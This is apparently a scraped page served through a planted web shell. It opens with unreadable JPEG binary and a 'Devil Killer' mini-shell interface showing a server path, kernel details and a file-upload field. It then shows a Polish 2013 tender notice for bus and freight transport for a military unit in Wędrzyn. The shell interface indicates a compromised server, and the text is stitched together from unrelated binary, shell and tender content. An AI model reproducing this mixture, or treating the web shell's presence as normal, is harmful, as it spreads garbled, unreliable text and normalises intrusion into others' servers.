JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130104/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130104/6738-N-2013.html

<p class="kh_header"><b>Wędrzyn: USŁUGI  TRANSPORTOWE 
PRZEWÓZ OSÓB ORAZ MIENIA  DLA 45 WOG w WĘDRZYNIE</b><br>
<b>Numer ogłoszenia: 6738 - 2013; data zamieszczenia: 04.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 5701 Wędrzyn , 69-211 Wędrzyn, woj. lubuskie, tel. 95 7556236, faks 95 7556222.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Organizacyjna Skarbu Państwa podległa MON.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGI  TRANSPORTOWE 
PRZEWÓZ OSÓB ORAZ MIENIA  DLA 45 WOG w WĘDRZYNIE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi transportowe, które zostały podzielone na dwa zadnia:
Zadanie 1-Przewóz osób
Zadanie 2-Przewóz mienia
Wykonawca może przystąpić do jednego lub dwóch zadań 
Zadanie 1
   1.1.Przewóz osób wraz z kierowcą dla JW 5700 Międzyrzecz oraz JW 5701 Wędrzyn, Przedszkoli  Wojskowych w Wędrzynie i Skwierzynie, Ośrodka Poligonowego Wojsk Lądowych w Wędrzynie, JW. 3949 Skwierzyna. 
         Powyższa usługa ma na celu zabezpieczenie działalności bieżącej i szkoleniowej oraz administracyjnej jednostek i instytucji usytuowanych w powyższych lokalizacjach                   i może objąć teren całego kraju. Usługa powinna zapewnić dojazdy na szkolenia poligonowe, szkolenia strzeleckie, skoki spadochronowe, szkolenia w Wojskowych Ośrodkach Szkolenia, zabezpieczenie przemieszczania PKW po terenie kraju w okresie przygotowania do wyjazdu lub powrotu (przewóz z lotnisk do macierzystych JW) zabezpieczenie uroczystości wojskowych oraz odpraw i szkoleń zgodnie                           z przesłanymi w tym zakresie potrzebami do 45 WOG.
1.2.	Przewozy mogą być realizowane w jedna stronę lub w obie, będzie zachodziła potrzeba oczekiwania podczas przerwy w podróży nawet do kilku godzin; 
1.3.	W celu właściwego wykonania usługi wymagane jest:
- posiadanie przynajmniej 3 autobusów wyposażonych w pasy bezpieczeństwa dla wszystkich pasażerów, 1 mikrobusa, 1 busa oraz przyczepka transportowa do przewożenia zwiększonej ilości bagażu;
- w przypadku potrzeby zorganizowania transportu dużej ilości osób pomoc           w zorganizowaniu takiego przemieszczenia jako znawca branży (w przypadku potrzeby większej ilości środków transportowych);
- posiadanie licencji na krajowy transport drogowy osób oraz na międzynarodowy transport drogowy (kraje NATO i UE) osób (1 bus i 1 autobus), w przypadku gdyby wystąpiła taka potrzeba. Przewiduje się wyjazdy do krajów: Niemcy Francja, Belgia, Włochy;
- wykonanie usługi na sprawnych technicznie środkach transportowych (własnych lub podnajętych);
- posiadanie polisy OC i NW, którą środki transportowe obligatoryjnie muszą posiadać oraz aktualne badania techniczne pojazdów;
- podstawienie zastępczego środka transportowego w przypadku unieruchomienia pojazdu podczas wykonywania usługi w czasie do 4 godz.;
- podstawienie zastępczego środka transportowego w przypadku zakwestionowania stanu technicznego podstawionego pojazdu w czasie do 1 godz.;
- Zapotrzebowania będą składane:
a.	w trybie normalnym z 36 godzinnym wyprzedzeniem;
b.	w trybie przyspieszonym z 12 godzinnym wyprzedzeniem;
c.	w przypadku przewożenia dużej ilości osób (100 i więcej z tygodniowym wyprzedzeniem
- wykonywanie usługi zgodnie z wymogami Kodeksu pracy i Ustawy z dnia 
16 kwietnia 2004 r. o czasie pracy kierowców (Dz. U. z dnia 30.04.2004, Dz. U.             Nr 92 poz. 879 z późniejszymi zm.) oraz zgodnie z wymogami Ustaw z dnia 20 czerwca 1997r. Prawo o ruchu drogowym (Dz. U. z dnia 2005r. Nr 108, poz. 908 z późniejszymi zm.) w zakresie dotyczącym pojazdów;
- terminowe podstawienie środków transportowych w wyznaczonym miejscu;
- podstawienie środka transportowego w należytej czystości wewnątrz i na zewnątrz pojazdu oraz systematyczne dbanie o zachowanie właściwej czystości w trakcie realizacji usługi transportowej;  
- możliwość przewiezienia jednorazowo do 150 osób w jednym kursie;
- odpłatność za autostrady powinny być wliczona w stawkę kilometrową;
- w przypadku wyjazdów kilkudniowych noclegi kierowcy i jego całodzienne wyżywienie kalkulować w stawkę kilometrową:
- potwierdzenie wykonania usługi realizowane będzie każdorazowo po zakończeniu przewozu poprzez podpisy kierowcy i dowódcy/dysponenta pojazdu w Karcie przejazdu (załącznik do umowy); 
- planowana ilość kilometrów do przejechania - 140 000 km  
- w przypadku długich tras wykonawca zapewnia kierowców na zmianę;
- ilość kilometrów do przejechania może ulec zmianie, zwiększyć lub zmniejszyć                   w zależności od potrzeb i własnych możliwości. 
- wyposażenie autobusów:
- siedzenia ergonomiczne;
- uchylne siedzenia;
- od 21 miejsc siedzących dla pasażerów;
- WC (w przypadku realizacji usług transportowych powyżej 200 km)
- sprawna klimatyzacja;
wyposażenie busa:
- oparcia z zagłówkami;
- uchylne siedzenia;
- od 8 do 20 miejsc siedzących dla pasażerów;
- sprawna klimatyzacja. 
- Informacje uzupełniające dla oferentów:
Wykonanie usługi liczone będzie od miejsca lokalizacji danej Jednostki lub Instytucji wskazanej w zamówieniu przez osobę upoważnioną przez Zamawiającego do miejsca docelowego, a w przypadkach przewozu osób w jedną stronę  opłata nastąpi za przejazd w obie strony. 
- do wyceny złożonej oferty należy przyjąć ceny za kilometr w której powinny znajdować się wszystkie składniki w zależności od wielkości przewożonej grupy w tym koszta utrzymania kierowcy, opłaty za płatne odcinki dróg, opłaty za parkingi:
- jedynym wyróżnikiem wyceny wykonanej usługi będzie stawka za kilometr.
- wycena do faktury będzie polegała na ustaleniu stanu faktycznego ilości przejechanych kilometrów oraz iloczyn stawki kilometrowej za zapotrzebowany pojazd;
- ocena przedmiotu zamówienia będzie wynikała z sumy stawek za poszczególne przewożone grupy osobowe podczas podróży:
a) przejazdy krajowe:
- mikrobus do 9 miejsc siedzących 
      - mikrobus do 9 miejsc siedzących + przyczepka transportowa      
- bus do 20 miejsc siedzących
- bus do 20 miejsc siedzących + przyczepka transportowa 
- autobus od 20 do 39 miejsc siedzących
- autobus od  20 do 39 miejsc siedzących + przyczepka transportowa 
- autobus od 39 do 59 miejsc siedzących 
- autobus od  39 do 59 miejsc siedzących + przyczepka transportowa 
b) przejazdy zagraniczne:
- mikrobus do 9 miejsc siedzących
- mikrobus do 9 miejsc siedzących + przyczepka transportowa 
- bus do 20 miejsc siedzących
   - bus do 20 miejsc siedzących + przyczepka transportowa 
         - autobus od 20 do 39 miejsc siedzących 
   - autobus od  20 do 39 miejsc siedzących + przyczepka transportowa 
   - autobus od 39 do 59 miejsc siedzących
   - autobus od  39 do 59 miejsc siedzących + przyczepka transportowa 
- Wykonawcy nie przysługują żadne roszczenia względem zamawiającego  z tytułu niezrealizowania w całości przedmiotu zamówienia

Zadanie 2 

   2.1. Przedmiotem zamówienia są usługi transportowe przewozu mienia wojskowego wraz z kierowcą różnymi rodzajami środków transportu, w tym: samochodami ciężarowymi z naczepą dużej ładowności, ciągnikami siodłowymi do przewozu kontenerów typu 1 C, ciągnikami samochodowymi z przyczepą do przewozy sprzętu ciężkiego o masie do 60 T. Jednostki posiadają sprzęt o wymiarach ponadnormatywnych w ruchu drogowym gdzie zachodzi potrzeba uzyskania pozwolenia drogowego na przemieszczenie z takim ładunkiem (samochodowe warsztaty remontowe, wóz pomocy technicznej WZT - 40T, KTO ROSOMAK - 23T, mosty towarzyszące BLG, trał Bożena - 60T). Wykonawca zobowiązuje się do:
   2.2. Przewóz mienia będzie się odbywać  na obszarze kraju w miejsce wskazane przez zamawiającego lub z miejsca wskazanego przez zamawiającego 
 2.3. Minimalny czas złożenia zamówienia 72 godziny, zorganizowanie wykonania usługi zgodnie  z  zamówieniem.
   2.4. Przewidywana ogólna liczba kilometrów do przejechania około 54 000km;

           Obowiązki Wykonawcy:
   2.5.W przypadku awarii w drodze  podjęcie zamówienia w trybie kontaktu bezpośredniego przez telefon od osoby upoważnionej;
2.6.	Wykonawca przystępujący do przetargu wykazuje gotowość do przewozu mienia wojskowego z zastrzeżeniem, że przygotowane środki finansowe przez zamawiającego nie muszą być w całości wydane na ten cel;
2.7.	Trasa przewozu liczona będzie wg następujących zasad:
a.	przewóz pojazdem obciążonym: od miejsca załadunku do miejsca wyładunku przewożonego mienia;
b.	przewóz pojazdem nieobciążonym: od miejsca stacjonowania pojazdu do miejsca załadunku oraz od miejsca wyładunku do miejsca stacjonowania pojazdu;
c.	w kosztach transportu powinny znajdować się wszystkie składniki związane     z przewozem (noclegi, przejazdy autostradą, pozwolenia na przejazd);
2.8.	Długość tras od 30 do 400 kilometrów w jedna stronę;
2.9.	Potrzeba przewozu operatora przewożonego sprzętu lub magazyniera w zależności      od  przewożonych materiałów;
    2.10.W sytuacjach szczególnych samodzielny przewóz wskazanego mienia wojskowego;
    2.11.Podstawienia do dyspozycji  zamawiającego pojazdów do przewozu materiałów                  i UiSW  (jednorazowo do 2 pojazdów z każdej grupy, w przypadkach szczególnych po wcześniejszych ustaleniach może zajść potrzeba zorganizowania większej grupy transportowej - jako znawca rynku pomoc w zorganizowaniu):
     2.12.  Podstawić samochód ciężarowy zgodnie z decyzją zamawiającego do przewozu:
 a)  Grupa transportowa I: pojazd ciężarowy ze skrzynią ładunkową do materiałów   masowych luzem, pakowanych w skrzyniach:
-   Do 5 T + (-) 1 T
-   Do 10T+ (-) 2 T
-   Do 15T+ (-) 3 T
b)	Grupa transportowa II: ciągnik samochodowy z przyczepą niskopodwoziową do przewozu sprzętu ciężkiego również z możliwością przewozu sprzętu o wymiarach ponad normatywnych do wagi 60T gdzie może zachodzić potrzeba uzyskania pozwolenia drogowego na przejazd: 
-   Do 15 T + (-) 1T
-   Do  25 T + (-) 2T
-  Do 45T  + (-) 3T
-  Do 60T  + (-) 3T 

c) Grupa transportowa III: ciągnik samochodowy z naczepą do przewozu 
    kontenerów:
-  obciążony:
- nieobciążony:
2.13. Podstawiania środka transportowego o odpowiednim typie i tonażu na żądanie  zamawiającego w żądane miejsce i o określonym czasie;

2.14.Realizacja zamówienia zgodnie z terminami uzgodnionymi z przedstawicielem   
        zamawiającego;
2.15. Do elastycznego reagowania na zwiększone potrzeby zamawiającego (może zajść  potrzeba wyznaczenia kilku środków transportowych przez pewien okres  codziennie);
2.16.	Reagowania na potrzeby zamawiającego z naruszeniem punktu 2.3 obowiązków (zamówienie może wpłynąć w terminie krótszym niż 72 godziny od terminu rozpoczęcia wykonania usługi) zamawiającego;
2.17.Wykonawca zobowiązuje się do posiadania akcesoriów do mocowania ładunku  na transporcie samochodowym;
  2.18.Wykonawca będzie miał możliwość reagowania na awarie środka transportowego poprzez wystawienie innego środka transportowego (własnego lub poprzez wykorzystanie innej firmy);
 2.19. W przypadku awaryjnego korzystania z innej firmy przewozowej wykonawca nie będzie zwolniony z odpowiedzialności za właściwe wykonanie usługi (terminowość, standard autokaru, kultura osobista kierowców);
    2.20. W przypadku długich tras zapewnić kierowców na zmianę zgodnie z przepisami ruchu  drogowego;
  2.21.Podstawienia środka transportowego do wykonania usługi  z ważnymi badaniami  technicznymi;
2.22.Reagować na zamówienia telefoniczne zamawiającego w przypadku gdy nie będzie możliwości przedstawienia wniosku o wykonanie usługi poprzez przesłanie faksem   (np. dni wolne od pracy, świąteczne);
    2.23. Podać zamawiającemu numer telefonu służbowego stacjonarnego i komórkowego  w celu podjęcia usługi w trybie przyspieszonym (awaria) i w okresie dni wolnych lub świątecznych, długich weekendów;
  2.24. Wykonawca poda cenę 1 kilometra środka transportowego w zależności od rodzaju  zamówionego środka transportowego;
  2.25.Wykonawca gwarantuje zachowanie warunków umowy przez cały okres jej trwania;
    2.26.Wykonania usługi zgodnie z przepisami ruchu drogowego z zachowaniem wszelkich  form bezpieczeństwa w ruchu drogowym oraz innymi przepisami mówiącymi o przewożeniu urządzeń i materiałów o wymiarach ponadnormatywnych, materiałów  niebezpiecznych;
2.27. Wykonawca ponosi wszelkie koszta związane z przemieszczeniem ładunku (wszelkie obowiązkowe opłaty związane z transportem ponosi wykonawca), stawka kilometrowa złożona w ofercie powinna zawierać wszystkie składniki;
  2.28.W przypadkach szczególnych czynna organizacja nietypowej usługi (przewóz  materiałów o bardzo dużych wymiarach lub bardzo ciężkie) gdzie będzie wymagany sprzęt wysoko specjalistyczny do przewozu materiałów oraz uzyskanie pozwolenia na przemieszczenie;

Obowiązki zamawiającego:
- zamawiający dokona zamówienia na potrzeby przewozowe z 72 godzinnym wyprzedzeniem (w przypadkach szczególnych ten czas może ulec skróceniu do 24 godzin);
- zamawiający każdorazowo dokona zapłaty za wykonaną usługę zgodnie z zamówieniem w terminie 30 dni od wykonania usługi na podstawie prawidłowo wystawionej, dostarczonej faktury i załączonej prawidłowo wypełnionej karty przewozu (załącznik do umowy);
- dokonania zapłaty na konto wykonawcy;
- zamawiający wskaże osobę odpowiedzialną za przejazd która dokona potwierdzenia karty przewozu;
- dokona załadunku i rozładunku mienia na transport;
- zamawiający wskaże koordynatora który z ramienia dowódcy będzie nadzorować zamówienia  usług transportowych;
- w przypadkach szczególnych np. zwiększone potrzeby transportowe, przewóz materiałów o wymiarach ponadnormatywnych, o bardzo dużym ciężarze jednostka zgłosi potrzeby z wyprzedzeniem 20 dniowym, umożliwiając wykonawcy zorganizowanie transportu, uzyskanie pozwolenia na przemieszczenie, dokonania lokalnych uzgodnień w celu spełnienia warunków uzyskania pozwolenia na przewóz;
- W przypadku konieczności organizacji konwoju obowiązki konwojowania przejmuje zamawiający;
- Wykonawcy nie przysługują względem zamawiającego jakiekolwiek roszczenia            z tytułu niezrealizowania w całości przedmiotu zamówienia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.14.00.00-1, 60.17.00.00-0, 60.17.20.00-4, 60.10.00.00-9, 60.19.00.00-3, 60.18.10.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia tego warunku 
Wykonawca musi posiadać  licencję, w tym:
-  dla części pierwszej: uprawniającą do krajowego transportu osób oraz na  
  międzynarodowy transport drogowy osób  (kraje NATO i UE)
-  dla części drugiej: uprawniającą do krajowego transportu drogowego rzeczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania wiedzy i doświadczenia - w szczególności należytego wykonania dwóch usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,                   z podaniem  ich   rodzaju  i wartości  odpowiadające przedmiotowi zamówienia.
       Ocena spełnienia warunku będzie dokonana na podstawie złożonego wykazu  załącznik nr 5 wykonanych usług o podobnym charakterze i  dokumentów       potwierdzających, że usługi te zostały prawidłowo wykonane (referencje), na    zasadzie spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca dysponuje  potencjałem technicznym do wykonania zamówienia Wykonawca dołączy do oferty           oświadczenie zgodne ze wzorem stanowiącym załącznik nr 6, w którym           przedstawi  jakimi środkami transportu dysponuje przystępując do realizacji          przedmiotu zamówienia oraz oświadczy, iż usługi będą wykonywanie na                sprawnych technicznie środkach transportu posiadających ubezpieczenie                           OC i NNW oraz aktualne  badania   techniczne pojazdów. Wykonawca będzie        utrzymywał powyższy zakres ubezpieczenia do końca trwania umowy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający   wymaga   aby   usługi   były wykonywane przez osoby posiadające       wymagane uprawnienia do prowadzenia pojazdów  (autobusów, samochodów       ciężarowych) oraz zgodnie z zachowaniem obowiązujących przepisów,                           a  w  szczególności  Kodeksu pracy i ustawy z dnia 16  kwietnia 2004r.  o czasie pracy  kierowców (Dz. U z dnia 30.04.2004r; Dz. U. nr 92 poz.879 z późn.  zm.)   oraz zgodnie z wymogami ustawy z dnia 20 czerwca 1997r.  Prawo o ruchu  drogowym  (Dz. U. z 2005r. Nr 108, poz. 908  z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej 
i finansowej zapewniającej wykonanie zamówienia, zamawiający żąda złożenia        do oferty polisy  lub innego dokumentu ubezpieczenia potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej  w zakresie prowadzonej działalności  zgodnie z przedmiotem   zamówienia na kwotę  gwarantowaną  nie  mniejszą niż:
       -dla części pierwszej:  300 000,00 zł
       -dla części drugiej: 200 000,00zł
Wykonawca będzie utrzymywał  powyższy zakres ubezpieczenia do końca  trwania   umowy. Ocena spełniania  warunku będzie dokonana na podstawie  złożonego dokumentu na  zasadzie  spełnia-nie spełnia.
W przypadku przewozu ładunku (dot. zad 2) o większej wartości Wykonawca będzie zobowiązany do wykupienia i przedłożenia Zamawiającemu dodatkowej polisy OC z uwagi na wartość przewożonego mienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

